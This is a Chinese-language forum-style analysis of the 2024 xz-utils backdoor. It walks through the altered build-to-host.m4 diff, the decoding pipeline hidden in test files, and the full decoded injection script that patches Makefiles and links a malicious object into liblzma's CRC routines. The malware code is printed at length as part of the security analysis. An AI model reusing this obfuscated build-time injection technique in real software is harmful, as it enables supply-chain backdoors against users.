知名压缩软件 xz 被发现有后门,影响有多大?如何应对?

发布时间:
2024-04-07 04:00
阅读量:
73

这个后门的引入方式实在是太隐秘了, 如果不是发现者Andres Freund发现sshd进程的CPU占用率异常也不会发现这个后门.

拿这个有后门的m4脚本和原版对比一下, 能看出有什么问题吗? 我觉得基本上没人觉得有问题.

--- xz-5.6.1/m4/build-to-host.m4 2024-03-09 16:16:40.000000000 +0800 +++ /usr/share/aclocal/build-to-host.m4 2024-03-24 00:05:36.082517994 +0800 @@ -1,4 +1,4 @@ -# build-to-host.m4 serial 30 +# build-to-host.m4 serial 3 dnl Copyright (C) 2023-2024 Free Software Foundation, Inc. dnl This file is free software; the Free Software Foundation dnl gives unlimited permission to copy and/or distribute it, @@ -37,7 +37,6 @@ dnl Define somedir_c. gl_final_[$1]="$[$1]" - gl_[$1]_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"` dnl Translate it from build syntax to host syntax. case "$build_os" in cygwin*) @@ -59,40 +58,14 @@ if test "$[$1]_c_make" = '\"'"${gl_final_[$1]}"'\"'; then [$1]_c_make='\"$([$1])\"' fi - if test "x$gl_am_configmake" != "x"; then - gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null' - else - gl_[$1]_config='' - fi - _LT_TAGDECL([], [gl_path_map], [2])dnl - _LT_TAGDECL([], [gl_[$1]_prefix], [2])dnl - _LT_TAGDECL([], [gl_am_configmake], [2])dnl - _LT_TAGDECL([], [[$1]_c_make], [2])dnl - _LT_TAGDECL([], [gl_[$1]_config], [2])dnl AC_SUBST([$1_c_make]) - - dnl If the host conversion code has been placed in $gl_config_gt, - dnl instead of duplicating it all over again into config.status, - dnl then we will have config.status run $gl_config_gt later, so it - dnl needs to know what name is stored there: - AC_CONFIG_COMMANDS([build-to-host], [eval $gl_config_gt | $SHELL 2>/dev/null], [gl_config_gt="eval \$gl_[$1]_config"]) ]) dnl Some initializations for gl_BUILD_TO_HOST. AC_DEFUN([gl_BUILD_TO_HOST_INIT], [ - dnl Search for Automake-defined pkg* macros, in the order - dnl listed in the Automake 1.10a+ documentation. - gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null` - if test -n "$gl_am_configmake"; then - HAVE_PKG_CONFIGMAKE=1 - else - HAVE_PKG_CONFIGMAKE=0 - fi - gl_sed_double_backslashes='s/\\/\\\\/g' gl_sed_escape_doublequotes='s/"/\\"/g' - gl_path_map='tr "\t \-_" " \t_\-"' changequote(,)dnl gl_sed_escape_for_make_1="s,\\([ \"&'();<>\\\\\`|]\\),\\\\\\1,g" changequote([,])dnl

但是, 注意到grep -aErls "#{4}[[:alnum:]]{5}#{4}$" ./在源码根目录的执行结果就是./tests/files/bad-3-corrupt_lzma2.xz

grep的命令行参数

  • -a: 将二进制文件当作文本处理
  • -E: 扩充的正则表达式语法
  • -r: 递归的搜索子目录
  • -l: 输出匹配的文件名, 而不是匹配到的内容
  • -s: 不输出无法读取或者不存在的文件

正则表达式的内容:

  • #{4}:匹配连续出现4个#符号。
  • [[:alnum:]]{5}:匹配连续出现5个字母或数字字符。[[:alnum:]] 是一个字符类,匹配任意字母或数字字符。
  • #{4}:再次匹配连续出现4个#符号。
  • $:表示匹配字符串的末尾。

文件中的####World#### 就是被匹配到的内容.

可见包括后门的恶意文件的文件名并非明文出现在构建脚本中, 而是使用grep倒了一手.

然后gl_[$1]_prefix=echo $gl_am_configmake | sed "s/.*\.//g" 得到恶意文件的扩展名xz, 但实际上是xz这个命令行工具的名称. 看来这个后门的解压还必须先安装了xz-utils包才行.

整个解压的命令是

sed "r\n" ./tests/files/bad-3-corrupt_lzma2.xz | tr "\t \-_" " \t_\-" | xz -d 2> /dev/null

  • sed "r\n" filename和直接cat没什么区别
  • tr这个命令对压缩内容的一些ascii编码部分进行替换
    • \t代表制表符(Tab)
    • \ 代表空格
    • \-代表破折号(减号)
    • _代表下划线
  • 也就是将制表符、空格、破折号和下划线之间的字符进行相互替换。将制表符替换为一个空格,将空格替换为一个制表符,将破折号替换为下划线,将下划线替换为破折号。
  • xz -d对输入进行解压

解压结果为:

####Hello#### #�U��$� [ ! $(uname) = "Linux" ] && exit 0 [ ! $(uname) = "Linux" ] && exit 0 [ ! $(uname) = "Linux" ] && exit 0 [ ! $(uname) = "Linux" ] && exit 0 [ ! $(uname) = "Linux" ] && exit 0 eval `grep ^srcdir= config.status` if test -f ../../config.status;then eval `grep ^srcdir= ../../config.status` srcdir="../../$srcdir" fi export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31233|tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh ####World####

看上去非Linux系统不会执行感染操作.

这个脚本通过寻找和读取config.status的方式拿到源码的根目录. 因为很多发行版编译程序会单独建立build目录, 不会在源码目录运行conp和make. 源码的地址存到srcdir变量下面.

然后export的i指令是一大长串用head来乱序的从文件读取内容.

然后就是运行如下命令, 这里我删去最后的送给/bin/sh执行的部分.

xz -dc ./tests/files/good-large_compressed.lzma| \ eval $i| \ tail -c +31233| \ tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377" | \ xz -F raw --lzma1 -dc

输出的内容为(经过了格式化)

P="-fPIC -DPIC -fno-lto -ffunction-sections -fdata-sections" C="pic_flag=\" $P\"" O="^pic_flag=\" -fPIC -DPIC\"$" R="is_arch_extension_supported" x="__get_cpuid(" p="good-large_compressed.lzma" U="bad-3-corrupt_lzma2.xz" [ ! $(uname)="Linux" ] && exit 0 eval $zrKcVq if test -f config.status; then eval $zrKcSS eval $(grep ^LD=\'\/ config.status) eval $(grep ^CC=\' config.status) eval $(grep ^GCC=\' config.status) eval $(grep ^srcdir=\' config.status) eval $(grep ^build=\'x86_64 config.status) eval $(grep ^enable_shared=\'yes\' config.status) eval $(grep ^enable_static=\' config.status) eval $(grep ^gl_path_map=\' config.status) vs=$(grep -broaF '~!:_ W' $srcdir/tests/files/ 2>/dev/null) if test "x$vs" != "x" >/dev/null 2>&1; then f1=$(echo $vs | cut -d: -f1) if test "x$f1" != "x" >/dev/null 2>&1; then start=$(expr $(echo $vs | cut -d: -f2) + 7) ve=$(grep -broaF '|_!{ -' $srcdir/tests/files/ 2>/dev/null) if test "x$ve" != "x" >/dev/null 2>&1; then f2=$(echo $ve | cut -d: -f1) if test "x$f2" != "x" >/dev/null 2>&1; then [ ! "x$f2" = "x$f1" ] && exit 0 [ ! -f $f1 ] && exit 0 end=$(expr $(echo $ve | cut -d: -f2) - $start) eval $(cat $f1 | tail -c +${start} | head -c +${end} | tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377" | xz -F raw --lzma2 -dc) fi fi fi fi eval $zrKccj if ! grep -qs '\["HAVE_FUNC_ATTRIBUTE_IFUNC"\]=" 1"' config.status >/dev/null 2>&1; then exit 0 fi if ! grep -qs 'define HAVE_FUNC_ATTRIBUTE_IFUNC 1' config.h >/dev/null 2>&1; then exit 0 fi if test "x$enable_shared" != "xyes"; then exit 0 fi if ! (echo "$build" | grep -Eq "^x86_64" >/dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" >/dev/null 2>&1); then exit 0 fi if ! grep -qs "$R()" $srcdir/src/liblzma/check/crc64_fast.c >/dev/null 2>&1; then exit 0 fi if ! grep -qs "$R()" $srcdir/src/liblzma/check/crc32_fast.c >/dev/null 2>&1; then exit 0 fi if ! grep -qs "$R" $srcdir/src/liblzma/check/crc_x86_clmul.h >/dev/null 2>&1; then exit 0 fi if ! grep -qs "$x" $srcdir/src/liblzma/check/crc_x86_clmul.h >/dev/null 2>&1; then exit 0 fi if test "x$GCC" != 'xyes' >/dev/null 2>&1; then exit 0 fi if test "x$CC" != 'xgcc' >/dev/null 2>&1; then exit 0 fi LDv=$LD" -v" if ! $LDv 2>&1 | grep -qs 'GNU ld' >/dev/null 2>&1; then exit 0 fi if ! test -f "$srcdir/tests/files/$p" >/dev/null 2>&1; then exit 0 fi if ! test -f "$srcdir/tests/files/$U" >/dev/null 2>&1; then exit 0 fi if test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64"; then eval $zrKcst j="^ACLOCAL_M4 = \$(top_srcdir)\/aclocal.m4" if ! grep -qs "$j" src/liblzma/Makefile >/dev/null 2>&1; then exit 0 fi z="^am__uninstall_files_from_dir = {" if ! grep -qs "$z" src/liblzma/Makefile >/dev/null 2>&1; then exit 0 fi w="^am__install_max =" if ! grep -qs "$w" src/liblzma/Makefile >/dev/null 2>&1; then exit 0 fi E=$z if ! grep -qs "$E" src/liblzma/Makefile >/dev/null 2>&1; then exit 0 fi Q="^am__vpath_adj_setup =" if ! grep -qs "$Q" src/liblzma/Makefile >/dev/null 2>&1; then exit 0 fi M="^am__include = include" if ! grep -qs "$M" src/liblzma/Makefile >/dev/null 2>&1; then exit 0 fi L="^all: all-recursive$" if ! grep -qs "$L" src/liblzma/Makefile >/dev/null 2>&1; then exit 0 fi m="^LTLIBRARIES = \$(lib_LTLIBRARIES)" if ! grep -qs "$m" src/liblzma/Makefile >/dev/null 2>&1; then exit 0 fi u="AM_V_CCLD = \$(am__v_CCLD_\$(V))" if ! grep -qs "$u" src/liblzma/Makefile >/dev/null 2>&1; then exit 0 fi if ! grep -qs "$O" libtool >/dev/null 2>&1; then exit 0 fi eval $zrKcTy b="am__test = $U" sed -i "/$j/i$b" src/liblzma/Makefile || true d=$(echo $gl_path_map | sed 's/\\/\\\\/g') b="am__strip_prefix = $d" sed -i "/$w/i$b" src/liblzma/Makefile || true b="am__dist_setup = \$(am__strip_prefix) | xz -d 2>/dev/null | \$(SHELL)" sed -i "/$E/i$b" src/liblzma/Makefile || true b="\$(top_srcdir)/tests/files/\$(am__test)" s="am__test_dir=$b" sed -i "/$Q/i$s" src/liblzma/Makefile || true h="-Wl,--sort-section=name,-X" if ! echo "$LDFLAGS" | grep -qs -e "-z,now" -e "-z -Wl,now" >/dev/null 2>&1; then h=$h",-z,now" fi j="liblzma_la_LDFLAGS += $h" sed -i "/$L/i$j" src/liblzma/Makefile || true sed -i "s/$O/$C/g" libtool || true k="AM_V_CCLD = @echo -n \$(LTDEPS); \$(am__v_CCLD_\$(V))" sed -i "s/$u/$k/" src/liblzma/Makefile || true l="LTDEPS='\$(lib_LTDEPS)'; \\\\\n\ export top_srcdir='\$(top_srcdir)'; \\\\\n\ export CC='\$(CC)'; \\\\\n\ export DEFS='\$(DEFS)'; \\\\\n\ export DEFAULT_INCLUDES='\$(DEFAULT_INCLUDES)'; \\\\\n\ export INCLUDES='\$(INCLUDES)'; \\\\\n\ export liblzma_la_CPPFLAGS='\$(liblzma_la_CPPFLAGS)'; \\\\\n\ export CPPFLAGS='\$(CPPFLAGS)'; \\\\\n\ export AM_CFLAGS='\$(AM_CFLAGS)'; \\\\\n\ export CFLAGS='\$(CFLAGS)'; \\\\\n\ export AM_V_CCLD='\$(am__v_CCLD_\$(V))'; \\\\\n\ export liblzma_la_LINK='\$(liblzma_la_LINK)'; \\\\\n\ export libdir='\$(libdir)'; \\\\\n\ export liblzma_la_OBJECTS='\$(liblzma_la_OBJECTS)'; \\\\\n\ export liblzma_la_LIBADD='\$(liblzma_la_LIBADD)'; \\\\\n\ sed rpath \$(am__test_dir) | \$(am__dist_setup) >/dev/null 2>&1" sed -i "/$m/i$l" src/liblzma/Makefile || true eval $zrKcHD fi elif (test -f .libs/liblzma_la-crc64_fast.o) && (test -f .libs/liblzma_la-crc32_fast.o); then vs=$(grep -broaF 'jV!.^%' $top_srcdir/tests/files/ 2>/dev/null) if test "x$vs" != "x" >/dev/null 2>&1; then f1=$(echo $vs | cut -d: -f1) if test "x$f1" != "x" >/dev/null 2>&1; then start=$(expr $(echo $vs | cut -d: -f2) + 7) ve=$(grep -broaF '%.R.1Z' $top_srcdir/tests/files/ 2>/dev/null) if test "x$ve" != "x" >/dev/null 2>&1; then f2=$(echo $ve | cut -d: -f1) if test "x$f2" != "x" >/dev/null 2>&1; then [ ! "x$f2" = "x$f1" ] && exit 0 [ ! -f $f1 ] && exit 0 end=$(expr $(echo $ve | cut -d: -f2) - $start) eval $(cat $f1 | tail -c +${start} | head -c +${end} | tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377" | xz -F raw --lzma2 -dc) fi fi fi fi eval $zrKcKQ if ! grep -qs "$R()" $top_srcdir/src/liblzma/check/crc64_fast.c; then exit 0 fi if ! grep -qs "$R()" $top_srcdir/src/liblzma/check/crc32_fast.c; then exit 0 fi if ! grep -qs "$R" $top_srcdir/src/liblzma/check/crc_x86_clmul.h; then exit 0 fi if ! grep -qs "$x" $top_srcdir/src/liblzma/check/crc_x86_clmul.h; then exit 0 fi if ! grep -qs "$C" ../../libtool; then exit 0 fi if ! echo $liblzma_la_LINK | grep -qs -e "-z,now" -e "-z -Wl,now" >/dev/null 2>&1; then exit 0 fi if echo $liblzma_la_LINK | grep -qs -e "lazy" >/dev/null 2>&1; then exit 0 fi N=0 W=0 Y=$(grep "dnl Convert it to C string syntax." $top_srcdir/m4/gettext.m4) eval $zrKcjv if test -z "$Y"; then N=0 W=88664 else N=88664 W=0 fi xz -dc $top_srcdir/tests/files/$p | eval $i | LC_ALL=C sed "s/\(.\)/\1\n/g" | LC_ALL=C awk 'BEGIN{FS="\n";RS="\n";ORS="";m=256;for(i=0;i<m;i++){t[sprintf("x%c",i)]=i;c[i]=((i*7)+5)%m;}i=0;j=0;for(l=0;l<8192;l++){i=(i+1)%m;a=c[i];j=(j+a)%m;c[i]=c[j];c[j]=a;}}{v=t["x" (NF<1?RS:$1)];i=(i+1)%m;a=c[i];j=(j+a)%m;b=c[j];c[i]=b;c[j]=a;k=c[(a+b)%m];printf "%c",(v+k)%m}' | xz -dc --single-stream | ((head -c +$N > /dev/null 2>&1) && head -c +$W) > liblzma_la-crc64-fast.o || true if ! test -f liblzma_la-crc64-fast.o; then exit 0 fi cp .libs/liblzma_la-crc64_fast.o .libs/liblzma_la-crc64-fast.o || true V='#endif\n#if defined(CRC32_GENERIC) && defined(CRC64_GENERIC) && defined(CRC_X86_CLMUL) && defined(CRC_USE_IFUNC) && defined(PIC) && (defined(BUILDING_CRC64_CLMUL) || defined(BUILDING_CRC32_CLMUL))\nextern int _get_cpuid(int, void*, void*, void*, void*, void*);\nstatic inline bool _is_arch_extension_supported(void) { int success = 1; uint32_t r[4]; success = _get_cpuid(1, &r[0], &r[1], &r[2], &r[3], ((char*) __builtin_frame_address(0))-16); const uint32_t ecx_mask = (1 << 1) | (1 << 9) | (1 << 19); return success && (r[2] & ecx_mask) == ecx_mask; }\n#else\n#define _is_arch_extension_supported is_arch_extension_supported' eval $yosA if sed "/return is_arch_extension_supported()/ c\return _is_arch_extension_supported()" $top_srcdir/src/liblzma/check/crc64_fast.c | sed "/include \"crc_x86_clmul.h\"/a \\$V" | sed "1i # 0 \"$top_srcdir/src/liblzma/check/crc64_fast.c\"" 2>/dev/null | $CC $DEFS $DEFAULT_INCLUDES $INCLUDES $liblzma_la_CPPFLAGS $CPPFLAGS $AM_CFLAGS $CFLAGS -r liblzma_la-crc64-fast.o -x c - $P -o .libs/liblzma_la-crc64_fast.o 2>/dev/null; then cp .libs/liblzma_la-crc32_fast.o .libs/liblzma_la-crc32-fast.o || true eval $BPep if sed "/return is_arch_extension_supported()/ c\return _is_arch_extension_supported()" $top_srcdir/src/liblzma/check/crc32_fast.c | sed "/include \"crc32_arm64.h\"/a \\$V" | sed "1i # 0 \"$top_srcdir/src/liblzma/check/crc32_fast.c\"" 2>/dev/null | $CC $DEFS $DEFAULT_INCLUDES $INCLUDES $liblzma_la_CPPFLAGS $CPPFLAGS $AM_CFLAGS $CFLAGS -r -x c - $P -o .libs/liblzma_la-crc32_fast.o; then eval $RgYB if $AM_V_CCLD$liblzma_la_LINK -rpath $libdir $liblzma_la_OBJECTS $liblzma_la_LIBADD; then if test ! -f .libs/liblzma.so; then mv -f .libs/liblzma_la-crc32-fast.o .libs/liblzma_la-crc32_fast.o || true mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || true fi rm -fr .libs/liblzma.a .libs/liblzma.la .libs/liblzma.lai .libs/liblzma.so* || true else mv -f .libs/liblzma_la-crc32-fast.o .libs/liblzma_la-crc32_fast.o || true mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || true fi rm -f .libs/liblzma_la-crc32-fast.o || true rm -f .libs/liblzma_la-crc64-fast.o || true else mv -f .libs/liblzma_la-crc32-fast.o .libs/liblzma_la-crc32_fast.o || true mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || true fi else mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || true fi rm -f liblzma_la-crc64-fast.o || true fi eval $DHLd

这个复杂的脚本中包括了若干行为

  • 检测到环境不适合时就退出, 不执行加入后门的逻辑. 已知的如下环境不受影响
    • 不是Linux系统(uname不为Linux)
    • 没有IFUNC. IFUNC是GLIBC中用于覆盖符号的一个功能.
    • 不编译动态库(shared object)
    • 不是x86_64, 或者target triple结尾不是linux-gnu
    • 编译器不是GCC, 或者链接器不是GNU ld
  • 从测试文件中解压预编译的二进制文件
  • 修改源码和构建脚本

与很多报道不同, 上面格式化后的代码清楚的表明, 即使不是Debian或者RPM系的发行版, 如果试图在make后再次执行conp, 也会执行另一条感染的路径.

Debian或者RPM系的那条代码路径是将上述恶意脚本注入到Makefile中, 因为恶意代码的注入需要等到源码编译完成后才能进行. 注入到Makefile的逻辑相当于重新从tests里的两个样本中解压恶意脚本.

在真正的感染部分, 两个目标文件liblzma_la-crc64_fast.oliblzma_la-crc32_fast.o, 原本应该编译自./src/liblzma/check/crc64_fast.c./src/liblzma/check/crc32_fast.c, 被链接了恶意的object文件

此外指令集扩展检测函数被替换掉

#define BUILDING_CRC64_CLMUL #include "crc_x86_clmul.h" #endif #if defined(CRC32_GENERIC) && defined(CRC64_GENERIC) && \ defined(CRC_X86_CLMUL) && defined(CRC_USE_IFUNC) && defined(PIC) && \ (defined(BUILDING_CRC64_CLMUL) || defined(BUILDING_CRC32_CLMUL)) extern int _get_cpuid(int, void *, void *, void *, void *, void *); static inline bool _is_arch_extension_supported(void) { int success = 1; uint32_t r[4]; success = _get_cpuid(1, &r[0], &r[1], &r[2], &r[3], ((char *)__builtin_frame_address(0)) - 16); const uint32_t ecx_mask = (1 << 1) | (1 << 9) | (1 << 19); return success && (r[2] & ecx_mask) == ecx_mask; } #else #define _is_arch_extension_supported is_arch_extension_supported

正确的get_cpuid原型如下

static __inline int __get_cpuid (unsigned int __leaf, unsigned int *__eax, unsigned int *__ebx, unsigned int *__ecx, unsigned int *__edx)

也就是故意多输了一个参数. 而__builtin_frame_address可以获得函数的返回地址, 这里应该是试图在寄存器里留一个地址, 在x86_64 linux上, 这个寄存器是r9.

值得注意的是, 发布带有后门的作者Jia Tan在两个月前和Sam James在Gentoo Linux的bugzilla上讨论过GCC的一个bug导致ifunc的函数符号覆盖功能不正确的问题.

bugs.gentoo.org/925415

最终确定是一个GCC的bug

xz-utils segfaults when built with -fprofile-generate (bad interaction between IFUNC and binding?)

END